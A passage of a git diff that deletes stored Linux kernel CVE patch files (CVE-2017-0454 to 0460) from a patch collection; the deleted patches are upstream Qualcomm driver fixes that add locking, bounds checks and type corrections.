-@@ -256,6 +263,7 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
- 				copy_from_user(bufptr, (void *)arg,
- 					effects->config.buf_cfg.output_len)) {
- 				rc = -EFAULT;
-+				mutex_unlock(&effects->lock);
- 				goto ioctl_fail;
- 			}
- 			rc = q6asm_write(effects->ac,
-@@ -263,6 +271,7 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
- 					 0, 0, NO_TIMESTAMP);
- 			if (rc < 0) {
- 				rc = -EFAULT;
-+				mutex_unlock(&effects->lock);
- 				goto ioctl_fail;
- 			}
- 			atomic_dec(&effects->out_count);
-@@ -270,6 +279,7 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
- 			pr_err("%s: AUDIO_EFFECTS_WRITE: Buffer dropped\n",
- 				__func__);
- 		}
-+		mutex_unlock(&effects->lock);
- 		break;
- 	}
- 	case AUDIO_EFFECTS_READ: {
-@@ -458,6 +468,7 @@ static long audio_effects_ioctl(struct file *file, unsigned int cmd,
- 		break;
- 	}
- 	case AUDIO_EFFECTS_SET_BUF_LEN: {
-+		mutex_lock(&effects->lock);
- 		if (copy_from_user(&effects->config.buf_cfg, (void *)arg,
- 				   sizeof(effects->config.buf_cfg))) {
- 			pr_err("%s: copy from user for AUDIO_EFFECTS_SET_BUF_LEN failed\n",
-@@ -467,6 +478,7 @@ static long audio_effects_ioctl(struct file *file, unsigned int cmd,
- 		pr_debug("%s: write buf len: %d, read buf len: %d\n",
- 			 __func__, effects->config.buf_cfg.output_len,
- 			 effects->config.buf_cfg.input_len);
-+		mutex_unlock(&effects->lock);
- 		break;
- 	}
- 	case AUDIO_EFFECTS_GET_BUF_AVAIL: {
-@@ -711,6 +723,7 @@ static int audio_effects_release(struct inode *inode, struct file *file)
- 	}
- 	q6asm_audio_client_free(effects->ac);
- 
-+	mutex_destroy(&effects->lock);
- 	kfree(effects);
- 
- 	pr_debug("%s: close session success\n", __func__);
-@@ -741,6 +754,7 @@ static int audio_effects_open(struct inode *inode, struct file *file)
- 
- 	init_waitqueue_head(&effects->read_wait);
- 	init_waitqueue_head(&effects->write_wait);
-+	mutex_init(&effects->lock);
- 
- 	effects->opened = 0;
- 	effects->started = 0;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0454/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-0454/3.18/0002.patch
deleted file mode 100644
index ffa49b26..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0454/3.18/0002.patch
+++ /dev/null
@@ -1,119 +0,0 @@
-From 484349ebc927b7be6cc9187c6bd71ffb3f4112d1 Mon Sep 17 00:00:00 2001
-From: kunleiz <kunleiz@codeaurora.org>
-Date: Thu, 22 Dec 2016 18:03:37 +0800
-Subject: ASoC: msm: qdspv2: add mutex lock when access output buffer length
-
-Add mutex protection to avoid access output_len in parallel.
-
-CRs-Fixed: 1104067
-Change-Id: I4e17258e2abee9cd68152f4b79520b00003aa80d
-Signed-off-by: kunleiz <kunleiz@codeaurora.org>
----
- drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c | 16 +++++++++++++++-
- 1 file changed, 15 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-index 940fd08..9889d9c 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2014-2016, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2014-2017, The Linux Foundation. All rights reserved.
-  *
-  * This software is licensed under the terms of the GNU General Public
-  * License version 2, as published by the Free Software Foundation, and
-@@ -29,6 +29,8 @@ struct q6audio_effects {
- 	struct audio_client             *ac;
- 	struct msm_hwacc_effects_config  config;
- 
-+	struct mutex			lock;
-+
- 	atomic_t			in_count;
- 	atomic_t			out_count;
- 
-@@ -230,8 +232,11 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
- 		uint32_t idx = 0;
- 		uint32_t size = 0;
- 
-+		mutex_lock(&effects->lock);
-+
- 		if (!effects->started) {
- 			rc = -EFAULT;
-+			mutex_unlock(&effects->lock);
- 			goto ioctl_fail;
- 		}
- 
-@@ -241,11 +246,13 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
- 		if (!rc) {
- 			pr_err("%s: write wait_event_timeout\n", __func__);
- 			rc = -EFAULT;
-+			 mutex_unlock(&effects->lock);
- 			goto ioctl_fail;
- 		}
- 		if (!atomic_read(&effects->out_count)) {
- 			pr_err("%s: pcm stopped out_count 0\n", __func__);
- 			rc = -EFAULT;
-+			mutex_unlock(&effects->lock);
- 			goto ioctl_fail;
- 		}
- 
-@@ -255,6 +262,7 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
- 				copy_from_user(bufptr, (void *)arg,
- 					effects->config.buf_cfg.output_len)) {
- 				rc = -EFAULT;
-+				mutex_unlock(&effects->lock);
- 				goto ioctl_fail;
- 			}
- 			rc = q6asm_write(effects->ac,
-@@ -262,6 +270,7 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
- 					 0, 0, NO_TIMESTAMP);
- 			if (rc < 0) {
- 				rc = -EFAULT;
-+				mutex_unlock(&effects->lock);
- 				goto ioctl_fail;
- 			}
- 			atomic_dec(&effects->out_count);
-@@ -269,6 +278,7 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
- 			pr_err("%s: AUDIO_EFFECTS_WRITE: Buffer dropped\n",
- 				__func__);
- 		}
-+		mutex_unlock(&effects->lock);
- 		break;
- 	}
- 	case AUDIO_EFFECTS_READ: {
-@@ -466,6 +476,7 @@ static long audio_effects_ioctl(struct file *file, unsigned int cmd,
- 		break;
- 	}
- 	case AUDIO_EFFECTS_SET_BUF_LEN: {
-+		mutex_lock(&effects->lock);
- 		if (copy_from_user(&effects->config.buf_cfg, (void *)arg,
- 				   sizeof(effects->config.buf_cfg))) {
- 			pr_err("%s: copy from user for AUDIO_EFFECTS_SET_BUF_LEN failed\n",
-@@ -475,6 +486,7 @@ static long audio_effects_ioctl(struct file *file, unsigned int cmd,
- 		pr_debug("%s: write buf len: %d, read buf len: %d\n",
- 			 __func__, effects->config.buf_cfg.output_len,
- 			 effects->config.buf_cfg.input_len);
-+		mutex_unlock(&effects->lock);
- 		break;
- 	}
- 	case AUDIO_EFFECTS_GET_BUF_AVAIL: {
-@@ -719,6 +731,7 @@ static int audio_effects_release(struct inode *inode, struct file *file)
- 	}
- 	q6asm_audio_client_free(effects->ac);
- 
-+	mutex_destroy(&effects->lock);
- 	kfree(effects);
- 
- 	pr_debug("%s: close session success\n", __func__);
-@@ -749,6 +762,7 @@ static int audio_effects_open(struct inode *inode, struct file *file)
- 
- 	init_waitqueue_head(&effects->read_wait);
- 	init_waitqueue_head(&effects->write_wait);
-+	mutex_init(&effects->lock);
- 
- 	effects->opened = 0;
- 	effects->started = 0;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0454/4.4/0003.patch b/Patches/Linux_CVEs/CVE-2017-0454/4.4/0003.patch
deleted file mode 100644
index 48fd99e3..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0454/4.4/0003.patch
+++ /dev/null
@@ -1,119 +0,0 @@
-From 263bb8242e005803529cb7cd785354de817db88a Mon Sep 17 00:00:00 2001
-From: kunleiz <kunleiz@codeaurora.org>
-Date: Thu, 22 Dec 2016 18:03:37 +0800
-Subject: ASoC: msm: qdspv2: add mutex lock when access output buffer length
-
-Add mutex protection to avoid access output_len in parallel.
-
-CRs-Fixed: 1104067
-Change-Id: I4e17258e2abee9cd68152f4b79520b00003aa80d
-Signed-off-by: kunleiz <kunleiz@codeaurora.org>
----
- drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c | 16 +++++++++++++++-
- 1 file changed, 15 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-index 940fd08..9889d9c 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2014-2016, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2014-2017, The Linux Foundation. All rights reserved.
-  *
-  * This software is licensed under the terms of the GNU General Public
-  * License version 2, as published by the Free Software Foundation, and
-@@ -29,6 +29,8 @@ struct q6audio_effects {
- 	struct audio_client             *ac;
- 	struct msm_hwacc_effects_config  config;
- 
-+	struct mutex			lock;
-+
- 	atomic_t			in_count;
- 	atomic_t			out_count;
- 
-@@ -230,8 +232,11 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
- 		uint32_t idx = 0;
- 		uint32_t size = 0;
- 
-+		mutex_lock(&effects->lock);
-+
- 		if (!effects->started) {
- 			rc = -EFAULT;
-+			mutex_unlock(&effects->lock);
- 			goto ioctl_fail;
- 		}
- 
-@@ -241,11 +246,13 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
- 		if (!rc) {
- 			pr_err("%s: write wait_event_timeout\n", __func__);
- 			rc = -EFAULT;
-+			 mutex_unlock(&effects->lock);
- 			goto ioctl_fail;
- 		}
- 		if (!atomic_read(&effects->out_count)) {
- 			pr_err("%s: pcm stopped out_count 0\n", __func__);
- 			rc = -EFAULT;
-+			mutex_unlock(&effects->lock);
- 			goto ioctl_fail;
- 		}
- 
-@@ -255,6 +262,7 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
- 				copy_from_user(bufptr, (void *)arg,
- 					effects->config.buf_cfg.output_len)) {
- 				rc = -EFAULT;
-+				mutex_unlock(&effects->lock);
- 				goto ioctl_fail;
- 			}
- 			rc = q6asm_write(effects->ac,
-@@ -262,6 +270,7 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
- 					 0, 0, NO_TIMESTAMP);
- 			if (rc < 0) {
- 				rc = -EFAULT;
-+				mutex_unlock(&effects->lock);
- 				goto ioctl_fail;
- 			}
- 			atomic_dec(&effects->out_count);
-@@ -269,6 +278,7 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
- 			pr_err("%s: AUDIO_EFFECTS_WRITE: Buffer dropped\n",
- 				__func__);
- 		}
-+		mutex_unlock(&effects->lock);
- 		break;
- 	}
- 	case AUDIO_EFFECTS_READ: {
-@@ -466,6 +476,7 @@ static long audio_effects_ioctl(struct file *file, unsigned int cmd,
- 		break;
- 	}
- 	case AUDIO_EFFECTS_SET_BUF_LEN: {
-+		mutex_lock(&effects->lock);
- 		if (copy_from_user(&effects->config.buf_cfg, (void *)arg,
- 				   sizeof(effects->config.buf_cfg))) {
- 			pr_err("%s: copy from user for AUDIO_EFFECTS_SET_BUF_LEN failed\n",
-@@ -475,6 +486,7 @@ static long audio_effects_ioctl(struct file *file, unsigned int cmd,
- 		pr_debug("%s: write buf len: %d, read buf len: %d\n",
- 			 __func__, effects->config.buf_cfg.output_len,
- 			 effects->config.buf_cfg.input_len);
-+		mutex_unlock(&effects->lock);
- 		break;
- 	}
- 	case AUDIO_EFFECTS_GET_BUF_AVAIL: {
-@@ -719,6 +731,7 @@ static int audio_effects_release(struct inode *inode, struct file *file)
- 	}
- 	q6asm_audio_client_free(effects->ac);
- 
-+	mutex_destroy(&effects->lock);
- 	kfree(effects);
- 
- 	pr_debug("%s: close session success\n", __func__);
-@@ -749,6 +762,7 @@ static int audio_effects_open(struct inode *inode, struct file *file)
- 
- 	init_waitqueue_head(&effects->read_wait);
- 	init_waitqueue_head(&effects->write_wait);
-+	mutex_init(&effects->lock);
- 
- 	effects->opened = 0;
- 	effects->started = 0;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0455/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0455/ANY/0001.patch
deleted file mode 100644
index 21f3f63d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0455/ANY/0001.patch
+++ /dev/null
@@ -1,30 +0,0 @@
-From 2c00928b4884fdb0b1661bcc530d7e68c9561a2f Mon Sep 17 00:00:00 2001
-From: Parth Dixit <parthd@codeaurora.org>
-Date: Tue, 1 Nov 2016 16:06:21 +0530
-Subject: platform: msm_shared: return correct random number value
-
-random value returned from tz is truncated to one byte in
-existing implementation. Copy all the bytes of random number
-returned from tz.
-
-Change-Id: I12b609206448702d46a98d0fd5fb64b68b2c9801
----
- platform/msm_shared/scm.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/platform/msm_shared/scm.c b/platform/msm_shared/scm.c
-index d5653b5..403441c 100644
---- a/platform/msm_shared/scm.c
-+++ b/platform/msm_shared/scm.c
-@@ -1117,7 +1117,7 @@ int scm_random(uintptr_t * rbuf, uint32_t  r_len)
- 	}
- 
- 	//Copy back into the return buffer
--	*rbuf = *rand_buf;
-+	memscpy(rbuf, r_len, rand_buf, sizeof(rand_buf));
- 	return ret;
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0456/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0456/ANY/0001.patch
deleted file mode 100644
index 3f291a36..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0456/ANY/0001.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From dfb170e243a3082a668f77ec0190af2c2bed9161 Mon Sep 17 00:00:00 2001
-From: Ghanim Fodi <gfodi@codeaurora.org>
-Date: Wed, 8 Feb 2017 17:37:27 +0200
-Subject: msm: ipa: Update IPA rule temp buffer size
-
-IPA filtering and routing temp buffer size
-should be big enough to contain the maximum possible
-rule being composed.
-
-Change-Id: I3f4d7200a0117f41a69adaffcaec07abb19c46ee
-CRs-fixed: 1099598
-Signed-off-by: Ghanim Fodi <gfodi@codeaurora.org>
----
- drivers/platform/msm/ipa/ipa_v2/ipa_i.h | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/platform/msm/ipa/ipa_v2/ipa_i.h b/drivers/platform/msm/ipa/ipa_v2/ipa_i.h
-index 2407f6c..e5f04fd 100644
---- a/drivers/platform/msm/ipa/ipa_v2/ipa_i.h
-+++ b/drivers/platform/msm/ipa/ipa_v2/ipa_i.h
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -133,7 +133,7 @@
- 
- #define IPA_HW_TABLE_ALIGNMENT(start_ofst) \
- 	(((start_ofst) + 127) & ~127)
--#define IPA_RT_FLT_HW_RULE_BUF_SIZE	(128)
-+#define IPA_RT_FLT_HW_RULE_BUF_SIZE	(256)
- 
- #define IPA_HDR_PROC_CTX_TABLE_ALIGNMENT_BYTE 8
- #define IPA_HDR_PROC_CTX_TABLE_ALIGNMENT(start_ofst) \
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0457/3.10/0002.patch b/Patches/Linux_CVEs/CVE-2017-0457/3.10/0002.patch
deleted file mode 100644
index fe0e0e97..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0457/3.10/0002.patch
+++ /dev/null
@@ -1,68 +0,0 @@
-From 6f6ce85df80c31048863cd31349e86277d89ff36 Mon Sep 17 00:00:00 2001
-From: Biswajit Paul <biswajitpaul@codeaurora.org>
-Date: Tue, 13 Dec 2016 15:27:30 -0800
-Subject: [PATCH] msm: ADSPRPC: Buffer length to be copied is truncated
-
-The buffer length that is being used to allocate gets truncated
-due to it being assigned to wrong type causing a much smaller
-buffer to be allocated than what is required for copying.
-
-Bug: 31695439
-CRs-Fixed: 1100695
-Change-Id: I30818acd42bd282837c7c7aa16d56d3b95d4dfe7
-Signed-off-by: Sathish Ambley <sathishambley@codeaurora.org>
-Signed-off-by: Biswajit Paul <biswajitpaul@codeaurora.org>
----
- drivers/char/adsprpc.c | 18 ++++++++++++++----
- 1 file changed, 14 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/char/adsprpc.c b/drivers/char/adsprpc.c
-index a9c537b543122..f99855c0cacf5 100644
---- a/drivers/char/adsprpc.c
-+++ b/drivers/char/adsprpc.c
-@@ -833,9 +833,9 @@ static int get_args(uint32_t kernel, struct smq_invoke_ctx *ctx,
- 	void *args;
- 	remote_arg_t *pra = ctx->pra;
- 	remote_arg_t *rpra = ctx->rpra;
--	ssize_t rlen, used, size;
-+	ssize_t rlen, used, size, copylen = 0;
- 	uint32_t sc = ctx->sc, start;
--	int i, inh, bufs = 0, err = 0, oix, copylen = 0;
-+	int i, inh, bufs = 0, err = 0, oix;
- 	int inbufs = REMOTE_SCALARS_INBUFS(sc);
- 	int outbufs = REMOTE_SCALARS_OUTBUFS(sc);
- 	int cid = ctx->fdata->cid;
-@@ -884,13 +884,23 @@ static int get_args(uint32_t kernel, struct smq_invoke_ctx *ctx,
- 	/* calculate len requreed for copying */
- 	for (oix = 0; oix < inbufs + outbufs; ++oix) {
- 		int i = ctx->overps[oix]->raix;
-+		uintptr_t mstart, mend;
-+
- 		if (!pra[i].buf.len)
- 			continue;
- 		if (list[i].num)
- 			continue;
- 		if (ctx->overps[oix]->offset == 0)
- 			copylen = ALIGN(copylen, BALIGN);
--		copylen += ctx->overps[oix]->mend - ctx->overps[oix]->mstart;
-+		mstart = ctx->overps[oix]->mstart;
-+		mend = ctx->overps[oix]->mend;
-+		VERIFY(err, (mend - mstart) <= LONG_MAX);
-+		if (err)
-+			goto bail;
-+		copylen += mend - mstart;
-+		VERIFY(err, copylen >= 0);
-+		if (err)
-+			goto bail;
- 	}
- 
- 	/* alocate new buffer */
-@@ -916,7 +926,7 @@ static int get_args(uint32_t kernel, struct smq_invoke_ctx *ctx,
- 	/* copy non ion buffers */
- 	for (oix = 0; oix < inbufs + outbufs; ++oix) {
- 		int i = ctx->overps[oix]->raix;
--		int mlen = ctx->overps[oix]->mend - ctx->overps[oix]->mstart;
-+		ssize_t mlen = ctx->overps[oix]->mend - ctx->overps[oix]->mstart;
- 		if (!pra[i].buf.len)
- 			continue;
- 		if (list[i].num)
diff --git a/Patches/Linux_CVEs/CVE-2017-0457/3.18/0003.patch b/Patches/Linux_CVEs/CVE-2017-0457/3.18/0003.patch
deleted file mode 100644
index b5f7562c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0457/3.18/0003.patch
+++ /dev/null
@@ -1,57 +0,0 @@
-From f6e21d2a3778bcbbef7320ffbf31631d76679175 Mon Sep 17 00:00:00 2001
-From: Wei Wang <wvw@google.com>
-Date: Fri, 13 Jan 2017 20:00:07 -0800
-Subject: [PATCH] msm: ADSPRPC: Buffer length to be copied is truncated
-
-The buffer length that is being used to allocate gets truncated
-due to it being assigned to wrong type causing a much smaller
-buffer to be allocated than what is required for copying.
-
-Bug: 31695439
-CRs-Fixed: 1100695
-Change-Id: I30818acd42bd282837c7c7aa16d56d3b95d4dfe7
-Signed-off-by: Sathish Ambley <sathishambley@codeaurora.org>
-Signed-off-by: Biswajit Paul <biswajitpaul@codeaurora.org>
-Signed-off-by: Wei Wang <wvw@google.com>
----
- drivers/char/adsprpc.c | 13 +++++++++++--
- 1 file changed, 11 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/char/adsprpc.c b/drivers/char/adsprpc.c
-index 23e1e8b7d04a4..30a9bf32d0801 100644
---- a/drivers/char/adsprpc.c
-+++ b/drivers/char/adsprpc.c
-@@ -972,6 +972,7 @@ static int get_args(uint32_t kernel, struct smq_invoke_ctx *ctx)
- 	/* calculate len requreed for copying */
- 	for (oix = 0; oix < inbufs + outbufs; ++oix) {
- 		int i = ctx->overps[oix]->raix;
-+		uintptr_t mstart, mend;
- 		ssize_t len = lpra[i].buf.len;
- 		if (!len)
- 			continue;
-@@ -979,7 +980,15 @@ static int get_args(uint32_t kernel, struct smq_invoke_ctx *ctx)
- 			continue;
- 		if (ctx->overps[oix]->offset == 0)
- 			copylen = ALIGN(copylen, BALIGN);
--		copylen += ctx->overps[oix]->mend - ctx->overps[oix]->mstart;
-+		mstart = ctx->overps[oix]->mstart;
-+		mend = ctx->overps[oix]->mend;
-+		VERIFY(err, (mend - mstart) <= LONG_MAX);
-+		if (err)
-+			goto bail;
-+		copylen += mend - mstart;
-+		VERIFY(err, copylen >= 0);
-+		if (err)
-+			goto bail;
- 	}
- 	ctx->used = copylen;
- 
-@@ -1044,7 +1053,7 @@ static int get_args(uint32_t kernel, struct smq_invoke_ctx *ctx)
- 	for (oix = 0; oix < inbufs + outbufs; ++oix) {
- 		int i = ctx->overps[oix]->raix;
- 		struct fastrpc_mmap *map = ctx->maps[i];
--		int mlen = ctx->overps[oix]->mend - ctx->overps[oix]->mstart;
-+		ssize_t mlen = ctx->overps[oix]->mend - ctx->overps[oix]->mstart;
- 		uint64_t buf;
- 		ssize_t len = lpra[i].buf.len;
- 		if (!len)
diff --git a/Patches/Linux_CVEs/CVE-2017-0458/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0458/ANY/0001.patch
deleted file mode 100644
index 03b65c5d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0458/ANY/0001.patch
+++ /dev/null
@@ -1,62 +0,0 @@
-From eba46cb98431ba1d7a6bd859f26f6ad03f1bf4d4 Mon Sep 17 00:00:00 2001
-From: Rajesh Bondugula <rajeshb@codeaurora.org>
-Date: Tue, 15 Nov 2016 14:55:35 -0800
-Subject: msm: camera: eeprom: Validate the power setting size
-
-Validate the power setting size before copying.
-If userspace sends a value which is greater than
-MAX_POWER_CONFIG, then the driver accesses unintended memory.
-This change will fix the issue.
-
-Crs-Fixed: 1089433
-Signed-off-by: Rajesh Bondugula <rajeshb@codeaurora.org>
-Change-Id: Iaaa6f5b3c1c2ac5b5b38b3ac407d6ae394bba780
----
- .../msm/camera_v2/sensor/eeprom/msm_eeprom.c       | 24 +++++++++-------------
- 1 file changed, 10 insertions(+), 14 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/eeprom/msm_eeprom.c b/drivers/media/platform/msm/camera_v2/sensor/eeprom/msm_eeprom.c
-index 037e8b5..dd2f919 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/eeprom/msm_eeprom.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/eeprom/msm_eeprom.c
-@@ -1409,6 +1409,16 @@ static int eeprom_init_config32(struct msm_eeprom_ctrl_t *e_ctrl,
- 
- 	power_info = &(e_ctrl->eboard_info->power_info);
- 
-+	if ((power_setting_array32->size > MAX_POWER_CONFIG) ||
-+		(power_setting_array32->size_down > MAX_POWER_CONFIG) ||
-+		(!power_setting_array32->size) ||
-+		(!power_setting_array32->size_down)) {
-+		pr_err("%s:%d invalid power setting size=%d size_down=%d\n",
-+			__func__, __LINE__, power_setting_array32->size,
-+			power_setting_array32->size_down);
-+		rc = -EINVAL;
-+		goto free_mem;
-+	}
- 	msm_eeprom_copy_power_settings_compat(
- 		power_setting_array,
- 		power_setting_array32);
-@@ -1423,20 +1433,6 @@ static int eeprom_init_config32(struct msm_eeprom_ctrl_t *e_ctrl,
- 	power_info->power_down_setting_size =
- 		power_setting_array->size_down;
- 
--	if ((power_info->power_setting_size >
--		MAX_POWER_CONFIG) ||
--		(power_info->power_down_setting_size >
--		MAX_POWER_CONFIG) ||
--		(!power_info->power_down_setting_size) ||
--		(!power_info->power_setting_size)) {
--		rc = -EINVAL;
--		pr_err("%s:%d Invalid power setting size :%d, %d\n",
--			__func__, __LINE__,
--			power_info->power_setting_size,
--			power_info->power_down_setting_size);
--		goto free_mem;
--	}
--
- 	if (e_ctrl->i2c_client.cci_client) {
- 		e_ctrl->i2c_client.cci_client->i2c_freq_mode =
- 			cdata32->cfg.eeprom_info.i2c_freq_mode;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0459/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0459/ANY/0001.patch
deleted file mode 100644
index 87ce8587..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0459/ANY/0001.patch
+++ /dev/null
@@ -1,84 +0,0 @@
-From ffacf6e2dc41b6063c3564791ed7a2f903e7e3b7 Mon Sep 17 00:00:00 2001
-From: Skylar Chang <chiaweic@codeaurora.org>
-Date: Wed, 30 Nov 2016 14:41:24 -0800
-Subject: msm: ipa: fix the potential heap overflow on wan-driver
-
-Add the check on rmnet_ipa3_set_tether_client_pipe API
-to make sure not accessing move than QMI_IPA_MAX_PIPES_V01
-entries when user-space module compromised.
-
-Change-Id: I59d39c7e5743dfea17853b6c4709605d4ebae962
-Signed-off-by: Skylar Chang <chiaweic@codeaurora.org>
----
- drivers/platform/msm/ipa/ipa_v2/rmnet_ipa.c | 19 ++++++++++++++++++-
- drivers/platform/msm/ipa/ipa_v3/rmnet_ipa.c | 17 +++++++++++++++++
- 2 files changed, 35 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/platform/msm/ipa/ipa_v2/rmnet_ipa.c b/drivers/platform/msm/ipa/ipa_v2/rmnet_ipa.c
-index f81d637..2c43fc52 100644
---- a/drivers/platform/msm/ipa/ipa_v2/rmnet_ipa.c
-+++ b/drivers/platform/msm/ipa/ipa_v2/rmnet_ipa.c
-@@ -2507,7 +2507,7 @@ int rmnet_ipa_set_data_quota(struct wan_ioctl_set_data_quota *data)
-  *
-  * Return codes:
-  * 0: Success
-- * -EFAULT: Invalid interface name provided
-+ * -EFAULT: Invalid src/dst pipes provided
-  * other: See ipa_qmi_set_data_quota
-  */
- int rmnet_ipa_set_tether_client_pipe(
-@@ -2515,6 +2515,23 @@ int rmnet_ipa_set_tether_client_pipe(
- {
- 	int number, i;
- 
-+	/* error checking if ul_src_pipe_len valid or not*/
-+	if (data->ul_src_pipe_len > QMI_IPA_MAX_PIPES_V01 ||
-+		data->ul_src_pipe_len < 0) {
-+		IPAWANERR("UL src pipes %d exceeding max %d\n",
-+			data->ul_src_pipe_len,
-+			QMI_IPA_MAX_PIPES_V01);
-+		return -EFAULT;
-+	}
-+	/* error checking if dl_dst_pipe_len valid or not*/
-+	if (data->dl_dst_pipe_len > QMI_IPA_MAX_PIPES_V01 ||
-+		data->dl_dst_pipe_len < 0) {
-+		IPAWANERR("DL dst pipes %d exceeding max %d\n",
-+			data->dl_dst_pipe_len,
-+			QMI_IPA_MAX_PIPES_V01);
-+		return -EFAULT;
-+	}
-+
- 	IPAWANDBG("client %d, UL %d, DL %d, reset %d\n",
- 	data->ipa_client,
- 	data->ul_src_pipe_len,
-diff --git a/drivers/platform/msm/ipa/ipa_v3/rmnet_ipa.c b/drivers/platform/msm/ipa/ipa_v3/rmnet_ipa.c
-index 4ed2728..78187c9 100644
---- a/drivers/platform/msm/ipa/ipa_v3/rmnet_ipa.c
-+++ b/drivers/platform/msm/ipa/ipa_v3/rmnet_ipa.c
-@@ -2607,6 +2607,23 @@ int rmnet_ipa3_set_tether_client_pipe(
- {
- 	int number, i;
- 
-+	/* error checking if ul_src_pipe_len valid or not*/
-+	if (data->ul_src_pipe_len > QMI_IPA_MAX_PIPES_V01 ||
-+		data->ul_src_pipe_len < 0) {
-+		IPAWANERR("UL src pipes %d exceeding max %d\n",
-+			data->ul_src_pipe_len,
-+			QMI_IPA_MAX_PIPES_V01);
-+		return -EFAULT;
-+	}
-+	/* error checking if dl_dst_pipe_len valid or not*/
-+	if (data->dl_dst_pipe_len > QMI_IPA_MAX_PIPES_V01 ||
-+		data->dl_dst_pipe_len < 0) {
-+		IPAWANERR("DL dst pipes %d exceeding max %d\n",
-+			data->dl_dst_pipe_len,
-+			QMI_IPA_MAX_PIPES_V01);
-+		return -EFAULT;
-+	}
-+
- 	IPAWANDBG("client %d, UL %d, DL %d, reset %d\n",
- 	data->ipa_client,
- 	data->ul_src_pipe_len,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0460/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-0460/3.10/0001.patch
deleted file mode 100644
index 1894a635..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0460/3.10/0001.patch
+++ /dev/null
@@ -1,52 +0,0 @@
-From 93dd37c412dbadff9d5b1b6f7b317713192cab2b Mon Sep 17 00:00:00 2001
-From: Conner Huff <chuff@codeaurora.org>
-Date: Thu, 26 Jan 2017 11:52:17 -0800
-Subject: net: rmnet_data: Fix incorrect netlink handling
-
-rmnet_data netlink handler currently does not check for the
-incoming process pid and instead just loops back the pid.
-A malicious root user could potentially send a message with
-source pid 0 and this could cause rmnet_data to loop the message
-back till an out of memory situation occurs.
-
-rmnet_data also does not check for the message length of the
-incoming netlink messages and instead casts the netlink message
-without checking for the boundary.
-
-Fix these two scenarios by adding the pid and message length checks
-respectively.
-
-Bug: 31252965
-CRs-Fixed: 1098801
-Change-Id: I172c1a7112e67e82959b397af7ddfd963d819bdc
-Signed-off-by: Conner Huff <chuff@codeaurora.org>
----
- net/rmnet_data/rmnet_data_config.c | 7 ++++++-
- 1 file changed, 6 insertions(+), 1 deletion(-)
-
-diff --git a/net/rmnet_data/rmnet_data_config.c b/net/rmnet_data/rmnet_data_config.c
-index 2a4f56b..04d63989 100644
---- a/net/rmnet_data/rmnet_data_config.c
-+++ b/net/rmnet_data/rmnet_data_config.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2013-2015, The Linux Foundation. All rights reserved.
